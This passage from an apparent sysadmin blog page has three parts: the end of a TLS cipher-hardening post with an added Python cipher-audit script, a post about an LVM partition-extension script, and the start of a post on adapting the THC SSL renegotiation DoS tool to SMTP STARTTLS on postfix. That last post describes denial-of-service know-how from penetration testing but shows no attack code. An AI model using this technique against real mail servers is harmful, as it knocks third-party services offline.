If you really need to support older clients, then you could also consider leaving 3DES enabled.
Note: To get an A+ rating currently your certificate must have a SHA-256 chain and the server also needs to support TLS Fallback SCSV and apparently HTTP Strict Transport Security as well.
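
To check what the cipher string actually expands to on a given machine, the following added example (not from the original post) expands it with the OpenSSL library that the local Python is linked against and tests the result against the exclusions listed above. The marker table and function names are assumptions made for this example, and the number of suites will differ from the 30 quoted for openssl 1.0.1j depending on the OpenSSL build.

```python
import ssl

CIPHER_STRING = ("HIGH:!aNULL:!eNULL:!kECDH:!aDH:!RC4:!3DES:!CAMELLIA:"
                 "!MD5:!PSK:!SRP:!KRB5:@STRENGTH")

# Substrings of OpenSSL suite names that reveal a class the string excludes.
EXCLUDED_MARKERS = {
    "RC4": "RC4", "DES-CBC3": "3DES", "CAMELLIA": "Camellia", "MD5": "MD5 HMAC",
    "PSK": "PSK", "SRP": "SRP", "NULL": "no encryption (eNULL)",
}
ANON_PREFIXES = ("ADH-", "AECDH-")          # unauthenticated key exchange (aNULL)
PFS_PREFIXES = ("ECDHE-", "DHE-", "TLS_")   # TLS 1.3 names (TLS_*) are always ephemeral


def expand(cipher_string):
    """Expand a cipher string with the OpenSSL that this Python is linked against."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.set_ciphers(cipher_string)  # raises ssl.SSLError if nothing is selectable
    return ctx.get_ciphers()


def audit(cipher_string):
    """Return (suite name, reason) for every suite that contradicts the stated logic."""
    findings = []
    for suite in expand(cipher_string):
        name = suite["name"]
        findings += [(name, why) for marker, why in EXCLUDED_MARKERS.items()
                     if marker in name]
        if name.startswith(ANON_PREFIXES):
            findings.append((name, "no authentication (aNULL)"))
        if suite["strength_bits"] < 128:
            findings.append((name, "key shorter than 128 bits"))
    return findings


def non_pfs(cipher_string):
    """Suites without ephemeral key exchange, kept by the string for compatibility."""
    return [s["name"] for s in expand(cipher_string)
            if not s["name"].startswith(PFS_PREFIXES)]


if __name__ == "__main__":
    print(ssl.OPENSSL_VERSION, "->", len(expand(CIPHER_STRING)), "suites")
    print("violations:", audit(CIPHER_STRING) or "none")
    print("non-PFS suites to decide on:", non_pfs(CIPHER_STRING))
```

Python always lists the TLS 1.3 suites in addition to whatever the string selects, because `set_ciphers` only controls TLS 1.2 and older.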

[Script] Extending Linux LVM partitions

Here’s a script I wrote a while ago to extend LVM partitions on Linux machines.

The script assumes that you have extended the existing underlying physical (or “virtual” if it’s a VM) storage device prior to execution. It will rescan the disks (skip with -f), resize the existing partition (basically just setting a different end sector), reboot, and run scripts to extend the actual file system after the reboot. There are other ways to extend the disk space including creating a new partition on the additional disk space, but I’ve decided against that approach in favor of a single-partition scheme for management/simplicity’s sake.

This script will work with VMs and physical servers alike. I’ve tested it with RHEL 6/7 and CentOS 6/7, but it should generally work with other Linux distributions as well.

You can get the most recent version of this script on Github here. If you have any suggestions or improvements (which I’m sure there is plenty of room for), feel free to drop a comment or an issue or a pull-request on Github.

THC SSL Renegotiation DoS Tool for SMTP STARTTLS

The so-called Secure Client-Initiated Renegotiation function of SSL/TLS carries a DoS risk because it burdens the server’s CPU orders of magnitude more than that of the client initiating it. Because of that, Client-Initiated Renegotiation is nowadays disabled by default in virtually all widely used SSL/TLS implementations.

However, I noticed that it still seems to be enabled by default on the postfix SMTP daemon, including recent postfix (2.6.6) and openssl (1.0.1j) versions, and there appears to be no way of disabling it in the configuration. Since I had already used the thc ssl dos tool, which exploits this vulnerability, in previous penetration tests on webservers, I thought it would be nice if it worked with SMTP mailservers supporting STARTTLS as well.
